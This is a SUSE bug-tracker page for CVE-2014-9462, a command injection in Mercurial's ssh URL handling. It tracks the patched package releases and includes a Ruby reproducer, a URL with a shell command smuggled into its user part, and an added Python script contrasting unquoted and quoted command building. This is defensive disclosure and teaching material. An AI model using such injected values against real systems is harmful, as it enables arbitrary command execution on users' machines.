Bug 923070 (CVE-2014-9462) - VUL-0: CVE-2014-9462: mercurial: Command Injection via sshpeer._validaterepo()
Summary: VUL-0: CVE-2014-9462: mercurial: Command Injection via sshpeer._validaterepo()
Status: RESOLVED FIXED
Alias: CVE-2014-9462
Product: SUSE Security Incidents
Classification: Novell Products
Component: Incidents
Version: unspecified
Hardware: Other / OS: Other
Priority: P3 - Medium / Severity: Normal
Target Milestone: ---
Deadline: 2015-04-01
Assignee: Security Team bot
QA Contact: Security Team bot
URL: https://smash.suse.de/issue/114874/
Whiteboard: maint:released:sle11-sp3:61266
Keywords:
Depends on:
Blocks:
 
Reported: 2015-03-18 21:47 UTC by Marcus Meissner
Modified: 2015-06-17 13:07 UTC
CC: 3 users

See Also:
Found By: Security Response Team
Services Priority:
Business Priority:
Blocker: ---
Marketing QA Status: ---
IT Deployment: ---


Description Marcus Meissner 2015-03-18 21:47:44 UTC
via canonical cve

CVE-2014-9462

http://chargen.matasano.com/chargen/2015/3/17/this-new-vulnerability-mercurial-command-injection-cve-2014-9462.html

sshpeer._validaterepo() allows code injection

References:
http://people.canonical.com/~ubuntu-security/cve/2014/CVE-2014-9462.html
Comment 1 Swamp Workflow Management 2015-03-18 21:51:34 UTC
An update workflow for this issue was started.
This issue was rated as moderate.
Please submit fixed packages until 2015-04-01.
When done, reassign the bug to security-team@suse.de.
https://swamp.suse.de/webswamp/wf/61215
Comment 2 Swamp Workflow Management 2015-03-18 23:00:49 UTC
bugbot adjusting priority
Comment 3 Takashi Iwai 2015-03-20 12:20:59 UTC
The package has been submitted to SLE11, SLE11-SP3, SLE12, openSUSE-13.1 and openSUSE-13.2.  mercurial 3.3.2 on FACTORY already contains the fix.
Comment 4 Bernhard Wiedemann 2015-03-20 13:00:08 UTC
This is an autogenerated message for OBS integration:
This bug (923070) was mentioned in
https://build.opensuse.org/request/show/292024 13.2 / mercurial
https://build.opensuse.org/request/show/292025 13.1 / mercurial
Comment 6 Swamp Workflow Management 2015-03-27 17:04:55 UTC
openSUSE-SU-2015:0617-1: An update that fixes one vulnerability is now available.

Category: security (moderate)
Bug References: 923070
CVE References: CVE-2014-9462
Sources used:
openSUSE 13.2 (src):    mercurial-3.1.2-4.1
openSUSE 13.1 (src):    mercurial-2.7.1-2.4.1
Comment 7 Johannes Segitz 2015-05-05 09:37:34 UTC
Reproducer:
#!/usr/bin/env ruby

# The user part of the ssh:// URL carries a shell command, terminated by ';'.
repo_name='ssh://user;echo vulnerable;@example.com/hg/'

# Multi-argument system() execs hg directly, with no Ruby-side shell,
# so any shell execution observed below happens inside hg itself.
system('hg', 'clone', repo_name, "/tmp/xxxx" )

Vulnerable output:
ssh user;echo vulnerable;@example.com 'hg init hg/'
ssh: Could not resolve hostname user: Name or service not known
vulnerable
/bin/sh: @example.com: command not found
abort: could not create remote repo!

Good output:
ssh 'user;echo vulnerable;'@example.com 'hg init hg/'
Then it hangs for a while, you can kill it.
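The two outputs above differ only in how the user part of the URL is quoted before the ssh command string reaches the shell. The following Python script is an added illustration, not Mercurial's code and not part of the reproducer: it rebuilds the vulnerable and the fixed argument construction side by side and runs both through /bin/sh. Assumptions: a minimal ssh:// parser stands in for Mercurial's util.url, shlex.quote stands in for Mercurial's util.shellquote, and a printf stub replaces the ssh binary so the demo runs offline and prints each argv element on its own line.

```python
"""Added example: unquoted vs. shell-quoted ssh arguments (CVE-2014-9462 pattern).

Not Mercurial's code.  Models the two command lines shown in the
reproducer output; the parser, the printf stub and the defence-in-depth
check are assumptions made for this demo.
"""
import shlex
import subprocess

# Stand-in for the ssh binary so the demo runs offline: printf echoes each
# argv element on its own line, which makes the shell's tokenisation visible.
# Assumption: a POSIX /bin/sh with a printf builtin is available.
FAKE_SSH = "printf '%s\\n'"

# The URL from the reproducer above (constructed sample input).
SAMPLE_URL = "ssh://user;echo vulnerable;@example.com/hg/"


def split_ssh_url(url):
    """Minimal ssh:// parser for the demo (not Mercurial's util.url).

    Returns (user, host, path); user is '' when the URL carries none.
    """
    if not url.startswith("ssh://"):
        raise ValueError("not an ssh:// URL: %r" % url)
    netloc, _, path = url[len("ssh://"):].partition("/")
    user, _, host = netloc.rpartition("@")
    return user, host, path


def ssh_args_vulnerable(user, host):
    """Pre-fix pattern: user and host are interpolated verbatim into a
    string that is later handed to /bin/sh, so a ';' in the user part
    terminates the ssh command and starts a new one."""
    return "%s@%s" % (user, host) if user else host


def ssh_args_fixed(user, host):
    """Post-fix pattern: every untrusted component is shell-quoted before
    being joined.  shlex.quote leaves tokens made only of safe characters
    bare, which is why the 'good output' quotes the user but not example.com."""
    if user:
        return "%s@%s" % (shlex.quote(user), shlex.quote(host))
    return shlex.quote(host)


def build_init_command(url, fixed):
    """Return the shell string the pre-fix (fixed=False) or post-fix
    (fixed=True) construction would pass to the shell for 'hg init'."""
    user, host, path = split_ssh_url(url)
    args = ssh_args_fixed(user, host) if fixed else ssh_args_vulnerable(user, host)
    # The remote command was already quoted in both outputs above.
    remote = shlex.quote("hg init %s" % path)
    return "%s %s %s" % (FAKE_SSH, args, remote)


def run(url, fixed):
    """Execute the constructed command through /bin/sh and return stdout lines."""
    cmd = build_init_command(url, fixed)
    proc = subprocess.run(cmd, shell=True, capture_output=True, text=True)
    return proc.stdout.splitlines()


def has_shell_metachars(component):
    """Defence-in-depth check (an addition, not the upstream fix): an ssh
    user or host name has no business containing shell metacharacters, so
    reject them before any command is built rather than relying on quoting alone."""
    return any(c in component for c in ";|&$`\"'\\<>(){}*?!~ \t\n")


if __name__ == "__main__":
    print("vulnerable:", run(SAMPLE_URL, fixed=False))  # ['user', 'vulnerable']
    print("fixed:     ", run(SAMPLE_URL, fixed=True))   # ['user;echo vulnerable;@example.com', 'hg init hg/']
    user, host, _ = split_ssh_url(SAMPLE_URL)
    print("suspicious user part:", has_shell_metachars(user))  # True
```

In the vulnerable run the shell sees three commands (the stub with argument `user`, then `echo vulnerable`, then a failing `@example.com ...`), which is the same sequence the reproducer's "Vulnerable output" shows with the real ssh binary. In the fixed run the stub receives exactly two arguments, the full user@host token and the remote command, so nothing injected executes. Note that quoting on the local side fixes only this issue; the remote command is a separate trust boundary and has to be quoted independently, as both outputs above already do.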
Comment 8 Swamp Workflow Management 2015-05-05 12:05:04 UTC
SUSE-SU-2015:0817-1: An update that fixes one vulnerability is now available.

Category: security (moderate)
Bug References: 923070
CVE References: CVE-2014-9462
Sources used:
SUSE Linux Enterprise Software Development Kit 11 SP3 (src):    mercurial-2.3.2-0.9.2
Comment 9 Swamp Workflow Management 2015-05-08 09:05:09 UTC
SUSE-SU-2015:0836-1: An update that fixes one vulnerability is now available.

Category: security (moderate)
Bug References: 923070
CVE References: CVE-2014-9462
Sources used:
SUSE Linux Enterprise Software Development Kit 12 (src):    mercurial-2.8.2-3.1
Comment 10 Marcus Meissner 2015-06-17 13:07:51 UTC
released